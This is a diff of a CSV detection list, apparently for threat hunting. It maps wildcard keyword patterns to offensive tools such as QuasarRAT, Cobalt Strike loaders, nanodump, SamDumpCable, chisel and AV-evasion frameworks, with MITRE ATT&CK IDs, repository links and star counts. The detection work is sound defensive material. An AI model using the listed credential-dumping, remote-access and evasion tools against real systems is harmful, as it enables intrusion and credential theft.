Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*certsync-master.zip*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","6","566","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" +"*certsync_ntds_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*certsync-master.zip*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" "*cewl --depth * --with-numbers -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*CFCD0759E20F29C399C9D4210BE614E4E020BEE8*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" -"*cfprefsd_race_condition*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAMQ*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*CFCD0759E20F29C399C9D4210BE614E4E020BEE8*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*cfprefsd_race_condition*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAMQ*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" "*cGlpLmZkYS5nb3Y=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*cGlwZW5hbWU9*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" "*Chachi-Enumerator.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Chachi-Enumerator.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*ChaitanyaHaritash/kimi*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*chameleon.py *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*changepasswd.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*chameleon.py *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*changepasswd.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*change-windows10-mac-address.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" "*charlesnathansmith/whatlicense*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","1","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" "*charles-proxy*","offensive_tool_keyword","charles-proxy","A cross-platform GUI web debugging proxy to view intercepted HTTP and HTTPS/SSL live traffic","T1043.002 - T1556.001 - T1573.001","TA0012 - TA0017","N/A","N/A","Sniffing & Spoofing","https://charlesproxy.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*charlotte-main.zip*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","930","234","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*charlotte-main.zip*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*ChatLadon.exe*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "*ChatLadon.rar*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "*check_all*.c*","offensive_tool_keyword","CheckPlease","c project from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","0","N/A","N/A","9","861","187","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z" @@ -8387,11 +8535,11 @@ "*check_all*.pl*","offensive_tool_keyword","CheckPlease","perl script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","0","N/A","N/A","9","861","187","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z" "*check_all*.ps1*","offensive_tool_keyword","CheckPlease","ps1 script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","1","N/A","N/A","9","861","187","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z" "*check_all*.py*","offensive_tool_keyword","CheckPlease","python script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","1","N/A","N/A","9","861","187","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z" -"*check_and_write_IAT_Hook*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*check_and_write_IAT_Hook*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" "*check_cve-2020-1472.py*","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1072","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/WiIs0n/Zerologon_CVE-2020-1472","1","1","N/A","N/A","1","10","5","2020-10-05T07:47:02Z","2020-09-29T18:45:44Z" "*check_function ntdll.dll EtwEventWrite*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*check_ppl_requirements*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"*checkIfHiddenAPICall*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*checkIfHiddenAPICall*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*Check-LocalAdminHash.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*CheckPlease*","offensive_tool_keyword","CheckPlease","This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads.","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","0","N/A","N/A","9","861","187","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z" "*CheckPort.csproj*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" @@ -8405,42 +8553,42 @@ "*CheeseTools.sln*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*CheeseTools-master*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*chenjiandongx/sniffer*","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","1","N/A","N/A","7","668","58","2022-07-27T15:13:57Z","2021-11-08T15:36:03Z" -"*Chimera-main.zip*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","1","N/A","9","3","280","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" -"*Chimera-master.zip*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"*chisel -*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*chisel client -*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*chisel client http*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*chisel server -*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*Chimera-main.zip*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","1","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*Chimera-master.zip*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" 